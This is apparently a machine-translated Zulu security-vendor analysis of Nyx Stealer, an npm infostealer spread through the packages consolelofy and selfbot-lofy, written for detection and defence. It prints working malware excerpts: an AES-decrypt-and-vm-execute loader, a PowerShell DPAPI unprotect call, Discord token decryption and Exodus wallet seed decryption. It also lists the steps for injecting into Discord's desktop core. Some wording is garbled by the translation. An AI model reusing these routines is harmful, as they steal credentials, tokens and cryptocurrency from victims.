TL; DR
Ithimba Locwaningo Lokuphepha le-Xygeni ithole umkhankaso we-npm infostealer oyinkimbinkimbi olethwa ngamaphakheji amabili anonya: i-consolelofy futhi i-selfbot-lofy.
Inguqulo yakamuva (consolelofy@1.3.0) ifaka umthwalo wokukhokha obethelwe nge-AES ongu-216KB oqala ukubethela ngesikhathi sokusebenza bese usebenza nge vm.runInNewContext()Ngenxa yokuthi i-logic enonya ibethelwe ngokuphelele, ama-static scanner athembele ekuhlolweni kwezintambo awakwazi ukubona ukuziphatha kwawo kuze kube yisikhathi sokusetshenziswa.
Uma sekukhishwe ikhodi, umthwalo okhokhelwayo, obhalwe ngaphakathi Umenzi we-Nyx, okuhlosiwe:
- Amathokheni okuqinisekisa i-Discord
- Izitolo zokuqinisekisa isiphequluli ezingaphezu kuka-50
- Izandiso zesikhwama semali se-cryptocurrency ezingaphezu kuka-90
- Amaseshini eRoblox, Instagram, Spotify, Steam, Telegram, kanye neTikTok
- Ukuqhubeka kweklayenti ledeskithophu le-Discord
Zonke izinhlobo ezingu-20 kuzo zombili amaphakheji zibikiwe futhi zaqinisekiswa ukuthi zinonya.
Ukubuka Konke Kobuchwepheshe Kwale Npm Infostealer
Ngokungafani ne-malware yesikhathi sokufaka evamile, lo mkhankaso uthembele ku- isikhathi sokuqalisa imodeli yokususa ukubethela.
Bangu:
- Akukho okubi
preinstallorpostinstallhooks - Azikho izingcingo zenethiwekhi zesikhathi sokufaka ezisobala
- Ayikho i-logic yokuvuna iziqinisekiso zombhalo ocacile
Umthwalo okhokhelwayo usebenza uma imodyuli ingeniswa. Wonke umzimba ononya uyabethelwa futhi ubonakala kuphela kwimemori ngesikhathi sokusebenza.
Lo mklamo ugwema ukutholakala ngesikhathi sokufakwa kwephakheji.
Indlela Le Npm Infostealer Esebenza Ngayo Ngempela
Ngaphambi kokuhlaziya lokho i-Nyx Stealer ekwebayo, sidinga ukuqonda ukuthi isebenza kanjani.
I-logic enonya ngaphakathi kwale npm infostealer ilandela iphethini ehambisanayo:
Isilayishi esincane sisusa ukubethela umthwalo omkhulu obethelwe bese siwusebenzisa ngokuguquguqukayo ngaphakathi komongo we-Node.js VM.
Lo mklamo ungowokuhloswa. Umhlaseli akafihli ukusebenza ngemuva kokufiphaza kuphela, kodwa ukususa ikhodi enonya ekubonakaleni okungaguquki ngokuphelele.
Imodeli Yokusebenza Esezingeni Eliphezulu
Ezingeni eliphezulu, isimbozo senza izinto ezine:
- Ithola ukhiye we-AES kusuka kugama lokungena eliqinile kusetshenziswa i-SHA-256
- Isusa umbhalo omkhulu we-cipher obhalwe nge-hex usebenzisa i-AES-256-CBC
- Isebenzisa i-JavaScript ekhishwe ukubethela isebenzisa
vm.runInNewContext() - Ihlinzeka ngebhokisi lesanti elisaveza izinto zokuqala ezinamandla zesikhathi sokusebenza
Isifinyezo Sendlela Yokusebenza Eyinhloko
| Uphiko | Ukucushwa/Inani |
|---|---|
| I-Algorithm | I-AES-256-CBC |
| Ukutholwa Okubalulekile | I-SHA-256 (igama lokungena) |
| Ivektha Yokuqalisa (IV) | Amabhayithi angu-16 kwangu-0x00 |
| Ukubulawa | vm.runInNewContext(isusiwe ukubethela, i-sandbox) |
Ngokugxeka, ibhokisi lesanti lidlula:
requireprocessBuffer- Isilinganiso
- ukuthunyelwa kwemodyuli
Lokhu kusho ukuthi umthwalo okhokhelwayo osusiwe ugcina amandla aphelele oku:
- Izinqubo zokuzala
- Funda futhi ubhale amafayela
- Yenza izingcingo zenethiwekhi
- Shintsha izinhlelo zokusebenza zasendaweni
Lena akuyona i-VM ekhawulelwe. Iyi-VM esetshenziswa njenge-trampoline yokwenza.
Iphethini Yokubethela Isikhathi Sokusebenza (Indlela Yokusebenzisa Eyinhloko)
Iloja lincane.
Umzimba ononya awunjalo.
Ngezansi iphethini yokwenza etholakala ngaphakathi kwephakheji:
const crypto = require('crypto'); const vm = require('vm'); function decryptAndExecute(encryptedHex, passphrase) { const key = crypto.createHash('sha256') .update(passphrase) .digest(); const iv = Buffer.alloc(16, 0); const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv); let decrypted = decipher.update(encryptedHex, 'hex', 'utf8'); decrypted += decipher.final('utf8'); const sandbox = { require, module, exports, console, process, Buffer, __dirname, __filename, setTimeout, setInterval, clearTimeout, clearInterval }; vm.runInNewContext(decrypted, sandbox); } Kungani Lokhu Kubalulekile
Umthwalo okhokhelwayo osubhalwe phansi:
- Ingabe hhayi zikhona kumbhalo ocacile ngaphakathi kwephakheji ye-npm
- Akubonakali kalula
grepnoma ukuskena kwezintambo ezimile - Kuvela kuphela kwimemori ngesikhathi sokusebenza
- Isebenza ngamakhono okusebenza we-Node aphelele
Le nhlanganisela yokusebenza kwe-AES + VM iyisibonakaliso esiqinile sokuziphatha kwe- i-npm infostealer izama ukugwema ukuhlolwa okungaguquki.
Ngamanye amazwi:
Uma uskena isihlahla somthombo wephakheji, awuboni umuntu ontshontsha.
Ubona i-decryptor.
Kwenzekani Ngemva Kokususa Ukubethela
Uma sekuqediwe, i-Nyx Stealer iqala amaza okuqoqwa kwedatha ahambisanayo.
I-Wave 1: Ukukhishwa Kwemininingwane Yesiphequluli
I-malware:
- Ukulanda isikhathi sokusebenza sePython kusuka ku-NuGet CDN
- Ukufaka amalabhulali e-cryptographic
- Izitolo zokuqinisekisa ezisuselwe ku-Chromium
- Isusa izimfihlo ezivikelwe yi-DPAPI
Esikhundleni sokuhlanganisa ama-native bindings, isebenzisa i-PowerShell ukubiza i-Windows DPAPI ngqo.
function dpapiUnprotectWithPowerShell(dataBuf) { const b64 = dataBuf.toString('base64'); const ps = "Add-Type -AssemblyName System.Security;" + "$b=[Convert]::FromBase64String('" + b64 + "');" + "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" + "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" + "[Console]::Out.Write([Convert]::ToBase64String($p))"; const cmd = `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`; return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); } Le ndlela yokwenza:
- Igwema ukuhlanganiswa kwezinto zobuciko
- Isebenzisa ama-API e-crypto e-Windows endabuko
- Ihlangana namathuluzi okuphatha
Kuwukuqaqa imininingwane yezinga le-OS, hhayi ukuklwebha.
I-Wave 2: Ukususwa Kwethokheni Le-Discord
Umntshontshi uyazi ngephrothokholi. Uyaqonda ifomethi yethokheni ebethelwe ye-Discord.
function decryptToken(encryptedToken, key) { const tokenParts = encryptedToken.split('dQw4w9WgXcQ:'); const encryptedData = Buffer.from(tokenParts[1], 'base64'); const iv = encryptedData.slice(3, 15); const ciphertext = encryptedData.slice(15, -16); const tag = encryptedData.slice(-16); const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv); decipher.setAuthTag(tag); return decipher.update(ciphertext).toString('utf8'); } Ukugeleza kokusebenza:
- Khipha ukhiye oyinhloko ku-Discord's
Local State - Susa ukubethela ukhiye oyinhloko nge-DPAPI
- Susa ukubethela ama-token blobs e-AES-GCM
- Qinisekisa amathokheni ngokumelene ne-Discord API
- Cebisa nge-Nitro, amabheji, ulwazi lokukhokha
Lokhu akukhona ukulahla iziqinisekiso ezijwayelekile. Kuwukuntshontsha iseshini enolwazi ngemithethonqubo.
I-Wave 3: Ukuqondiswa kwe-Wallet ye-Cryptocurrency
I-npm infostealer ibala:
- Izandiso zesikhwama sesiphequluli ezingaphezu kuka-90
- Ama-wallet edeskithophu angu-27
- Izindlela zesikhwama semali esibandayo
- Amafayela embewu ye-Exodus
Isibonelo sokuzama ukususa ukubethela kwembewu:
function decryptSeco(content, password) { const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512'); const decipher = crypto.createDecipheriv( 'aes-256-gcm', key, content.slice(0, 12) ); decipher.setAuthTag(content.slice(-16)); return Buffer.concat([ decipher.update(content.slice(12, -16)), decipher.final() ]).toString('utf8'); } Uma kuphumelele, ukuthengiselana ngesikhwama semali kuyashesha futhi akulungiseki.
Lokhu kumelela i-vector yokwenza imali enenani eliphezulu kakhulu lomkhankaso.
Ukuphikelela nge-Discord Desktop Injection
Ngemva kokuthola iziqinisekiso, i-Nyx Stealer izama ukuqhubeka ngokushintsha i-database yendawo. I-Discord iklayenti.
I-Target:
%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js Ukulandelana Kokusebenza
Umenzi we-infostealer wenza lezi zinyathelo ezilandelayo:
- Iqeda ukusebenza kwezinqubo ze-Discord
- Ithola izinhlobo ze-Discord ezifakiwe (i-Stable, i-Canary, i-PTB)
- Ibhala ngaphezulu
discord_desktop_core/index.js - Ifaka i-webhook logic elawulwa umhlaseli
- Iqala kabusha i-Discord
Lokhu kuqinisekisa ukuthi amaseshini e-Discord esikhathi esizayo avuza ngokuzenzakalelayo amathokheni amasha okuqinisekisa.
Okubalulekile, lokhu kuqhubeka akuxhomekile emisebenzini ehleliwe noma ekuguqulweni kwerejistri. Kusebenzisa ukuguqulwa kwekhodi yezinga lesicelo, indlela eyimfihlo.
Ngisho noma iphakheji ye-npm enonya isuswa kamuva, iklayenti le-Discord lihlala lisengozini.
Ukuqhathanisa Kobuchwepheshe: I-Selfbot Esemthethweni vs i-npm Infostealer
| Uphiko | Umtapo Wolwazi Osemthethweni | I-Nyx npm Infostealer |
|---|---|---|
| Ukubethela | None | Umthwalo ophelele obethelwe nge-AES |
| I-Runtime VM | akudingekile | vm.runInNewContext ukubulawa |
| Ukufinyelela kokuqinisekisa | I-Discord API kuphela | Isiphequluli, ama-wallet, i-DPAPI |
| Ukulanda Kwangaphandle | Cha | Isikhathi sokusebenza sePython nge-NuGet |
| ukuphikelela | Cha | Ukufakwa kweklayenti le-Discord |
| Ukwenza imali | Ukuzenzakalela kwe-bot | Ukuthengiswa kabusha kweziqinisekiso |
Isendlalelo sokubethela sodwa sesivele sihlukanise lo mkhankaso nefoloko evamile yomthombo ovulekile.
I-Discord selfbot esemthethweni ayinaso isizathu sokubethela yonke i-codebase yayo, ikhiqize i-PowerShell ukuze ifinyelele i-DPAPI, ilande izikhathi zokusebenza zangaphandle, noma ishintshe izinhlelo zokusebenza zedeskithophu. Uma lawo makhono evela ngaphakathi kokuthembela okuthi kwenza ukusebenzisana kwe-Discord kube ngokuzenzakalela, ukungafani kwezakhiwo kuba nzima ukukushalazela.
Ngokombono wophenyo, le npm infostealer ishiya imikhondo ezingqimbeni eziningi. Kodwa-ke, izinkomba ezithembeke kakhulu akuzona ama-URL aqinile noma izindlela ezithile zamafayela, ngoba lezo zingashintsha phakathi kwezinguqulo. Esikhundleni salokho, izimpawu ezihlala isikhathi eside ziyisakhiwo.
Ezingeni lephakheji, ifulegi elibomvu eliqine kakhulu yinhlanganisela yomthwalo omkhulu obethelwe kanye ne-runtime decryption wrapper esebenza ngokushesha nge vm.runInNewContext()Nakuba ukubethela kukodwa kungeyona into enobungozi ngokwemvelo, ukusebenzisa ukubethela kwe-AES okulandelwa ukwenziwa kwe-VM okuguquguqukayo ngaphakathi kwephakheji yokusetshenziswa kwe-Discord kuyinto engavamile kakhulu.
Ezingeni lomsingathi, amaphethini asolisayo afaka phakathi umsebenzi ongalindelekile wokususa ukubethela kwe-DPAPI, ukuvela kwenqubo kusuka kumongo wokuxhomekeka kwe-Node.js, kanye nokuguqulwa kwamafayela esicelo sendawo okungafanele ashintshwe yimitapo yolwazi yangaphandle. Ngokufanayo, kungqimba yenethiwekhi, ukuxhumana kwesitayela se-webhook okuphumayo okuqalwe ukuxhomekeka kokuthuthukiswa kumelela enye i-anomaly enengqondo.
Ngamanye amazwi, indawo yokuthola akuyona inkomba eyodwa yokuyekethisa. Ubudlelwano bokubethela, ukusebenza kwesikhathi sokusebenza, ukufinyelela kweziqinisekiso, kanye nokuziphatha kokuphikelela okwembula usongo.
Ukutholwa Nokunciphisa I-Xygeni
Lo mshini we-npm infostealer ukhonjwe yi- Isexwayiso Sangaphambi Kwesikhathi Se-Malware ye-Xygeni (MEW) ngokusebenzisa ukuhlangana kokuziphatha okunezingqimba esikhundleni sokufanisa okulula kwesiginesha.
Esikhundleni sokusesha izintambo ezinobungozi ezaziwayo, i-MEW ihlola ukungalingani kwesakhiwo kulo lonke isihlahla somthombo ogcwele. Kulesi simo, ukutholwa kwavela ekuhlanganeni kwezimpawu eziningana: inqubo yokubethela ye-AES efakiwe endaweni yokungena kwemojuli, ukwenziwa ngokushesha ngaphakathi komongo we-VM, kanye nokungafani okucacile kwamandla nenhloso.
Okubalulekile, azikho kulezi zimpawu zodwa ezifakazela inhloso embi. Kodwa-ke, uma zihlaziywa ndawonye, ziveza umzamo wokufihla ukuziphatha kwesikhathi sokusebenza. Le ndlela ehlanganisiwe inciphisa kakhulu imiphumela engamanga ngenkathi ikhomba izinsongo zochungechunge lokuhlinzeka ngokuqiniseka okuphezulu.
Ngaphezu kwalokho, leli cala libonisa ukuthi kungani ukuhlolwa kwesikhathi sokufaka kukodwa kunganele. I-logic enonya ayihlali kuma-script omjikelezo wokuphila. Isebenza kuphela ngemva kokulayisha kwemojuli futhi ibonakala kuphela uma isusiwe kwimemori. Ngakho-ke, ukuzivikela okusebenzayo kudinga ukuhlaziywa okuqaphela ukubethela, ukuqashelwa kwephethini yokuziphatha, kanye nokuqapha okuqhubekayo kokuthembela ngale kwemicimbi yokufaka.
Ukususwa kwerejista kuyasabela. Ukuhlaziywa okuqaphela isikhathi sokusebenza kuyavimbela.
Kungani Lo Mqondisi we-npm Infostealer Ebalulekile
I-Nyx Stealer imelela ukuvela kwesakhiwo ku-malware esekelwe ku-npm.
Ngokomlando, amaphakheji amaningi anonya ayethembele kwizikripthi zesikhathi sokufaka ezibonakalayo noma ama-endpoints acacile okukhipha iziqinisekiso. Ngokuphambene nalokho, lo mkhankaso ubhala ngemfihlo umthwalo wawo wokukhokha, uhlehlisa ukusebenza kwesikhathi sokusebenza, usebenzisa ama-API esistimu yokusebenza asemthethweni, futhi usungula ukuphikelela ngaphakathi kwezinhlelo zokusebenza ezithembekile.
Ngenxa yalokho, umhlaseli akadingi ukusebenzisa ingqalasizinda ye-npm uqobo. Esikhundleni salokho, ukuhlasela kuyaphumelela ngoba ukufakwa kokuthembela kusho ukwethembana. Abathuthukisi bacabanga ukuthi ukungenisa umtapo wolwazi kuwumsebenzi ophephile, ikakhulukazi uma uziveza njengefoloko elifanele lethuluzi elidumile.
Njengoba izimiso zemvelo ziqhubeka nokukhula futhi amafoloko ekhula, lowo mngcele wokwethembana ongabonakali uba yindawo yokuhlasela ekhangayo kakhulu. Ngakho-ke, ukuzivikela kuma-infostealers e-npm anamuhla kudinga ukuqaphela amaphethini okwakha kunokufuna izintambo ezimile.
Ekugcineni, lo mkhankaso uqinisa isifundo esibalulekile ku- software supply chain security: izinsongo eziyingozi kakhulu akuzona lezo ezibonakala zinonya ekuqaleni, kodwa lezo ezibonakala zisemthethweni ngokwesakhiwo kuze kube yilapho isikhathi sokusebenza sembula ukuziphatha kwazo kwangempela.




